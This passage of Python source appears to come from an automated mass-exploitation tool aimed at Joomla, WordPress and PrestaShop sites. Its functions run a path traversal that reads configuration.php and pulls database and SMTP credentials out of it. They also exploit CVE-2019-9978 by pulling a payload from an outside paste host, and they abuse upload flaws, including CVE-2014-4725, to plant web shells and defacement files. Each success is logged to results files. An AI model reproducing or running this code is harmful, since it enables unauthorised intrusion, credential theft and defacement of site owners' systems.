return printModule.returnYes(site, 'N/A', 'Com_simplephotogallery',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery',
'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery',
'Joomla')
def Exploit(site):
try:
Exp = 'http://' + site + \
'/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php'
GetConfig = requests.get(Exp, timeout=5, headers=Headers)
if 'JConfig' in str(GetConfig.content):
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", str(GetConfig.content))
Getuser = re.findall("user = '******';", str(GetConfig.content))
Getpass = re.findall("password = '******';",
str(GetConfig.content))
Getdb = re.findall("db = '(.*)';", str(GetConfig.content))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] +
'\n---------------------\n')
getSMTP.GETSmtpJoomConf(str(GetConfig.content))
except:
return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer',
'Joomla')
return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer',
'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer', 'Joomla')
def Exploit(site):
try:
Payload = 'https://hastebin.com/raw/etonipusij'
exp = 'http://{}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={}'.format(
site, Payload)
requests.get(exp, timeout=10, headers=Headers)
CheckShell = requests.get('http://{}/wp-admin/vuln.php'.format(site),
timeout=10,
headers=Headers)
CheckIndex = requests.get('http://{}/wp-admin/vuln.htm'.format(site),
timeout=10,
headers=Headers)
if 'Vuln!!' in str(CheckIndex.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write('{}/wp-admin/vuln.htm\n'.format(site))
if 'Vuln!!' in str(CheckShell.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
'{}/wp-admin/vuln.php?cmd=whoami;);\n'.format(site))
return printModule.returnYes(site, 'CVE-2019-9978',
'Social Warfare', 'Wordpress')
else:
return printModule.returnNo(site, 'CVE-2019-9978',
'Social Warfare', 'Wordpress')
except:
return printModule.returnNo(site, 'CVE-2019-9978', 'Social Warfare',
'Wordpress')
def Exploit(site):
try:
FileShell = {'my-theme': open(MailPoetZipShell, 'rb')}
PostData = {'action': "themeupload", 'submitter': "Upload", 'overwriteexistingtheme': "on",
'page': 'GZNeFLoZAb'}
UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
url = "http://" + site + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
GoT = requests.post(url, files=FileShell, data=PostData, headers=UserAgent, timeout=10)
if 'page=wysija_campaigns&action=themes&reload=1' in str(GoT.content):
sh = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/vuln.php'
index = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/pwn.gif'
CheckShell = requests.get(sh, timeout=10, headers=Headers)
CheckIndex = requests.get(index, timeout=10, headers=Headers)
if 'Vuln!!' in str(CheckShell.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/uploads/wysija/themes/rock/vuln.php' + '\n')
if 'GIF89a' in str(CheckIndex.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' + '\n')
return printModule.returnYes(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
else:
return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
else:
return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
except:
return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
def Exploit(site):
try:
Exp = site + '/modules/columnadverts/uploadimage.php'
FileDataIndex = {'userfile': open('files/pwn.gif', 'rb')}
FileDataShell = {'userfile': open('files/up.php', 'rb')}
GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers)
if 'success' in GoT.content:
IndexPath = '/modules/columnadverts/slides/pwn.gif'
CheckIndex = requests.get('http://' + site + IndexPath, timeout=10, headers=Headers)
if 'GIF89a' in str(CheckIndex.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
requests.post('http://' + Exp, files=FileDataShell, timeout=10, headers=Headers)
ShellPath = '/modules/columnadverts/slides/up.php'
CheckShell = requests.get('http://' + site + ShellPath, timeout=10, headers=Headers)
if 'Vuln!!' in str(CheckShell.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + ShellPath + '\n')
return printModule.returnYes(site, 'N/A', 'Columnadverts Module', 'Prestashop')
else:
return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop')
else:
return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop')
except:
return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop')
def Exploit(site):
try:
Exp = site + '/modules/megamenu/uploadify/uploadify.php?id=pwn'
Checkvuln = requests.get('http://' + Exp, timeout=10, headers=Headers)
FileDataIndex = {'Filedata': open(Jce_Deface_image, 'rb')}
if Checkvuln.status_code == 200:
requests.post('http://' + Exp,
files=FileDataIndex,
timeout=10,
headers=Headers)
IndexPath = site + '/' + Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + IndexPath,
timeout=10,
headers=Headers)
if 'GIF89a' in CheckIndex.content:
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
return printModule.returnYes(site, 'N/A', 'megamenu Module',
'Prestashop')
else:
return printModule.returnNo(site, 'N/A', 'megamenu Module',
'Prestashop')
else:
return printModule.returnNo(site, 'N/A', 'megamenu Module',
'Prestashop')
except:
return printModule.returnNo(site, 'N/A', 'megamenu Module',
'Prestashop')
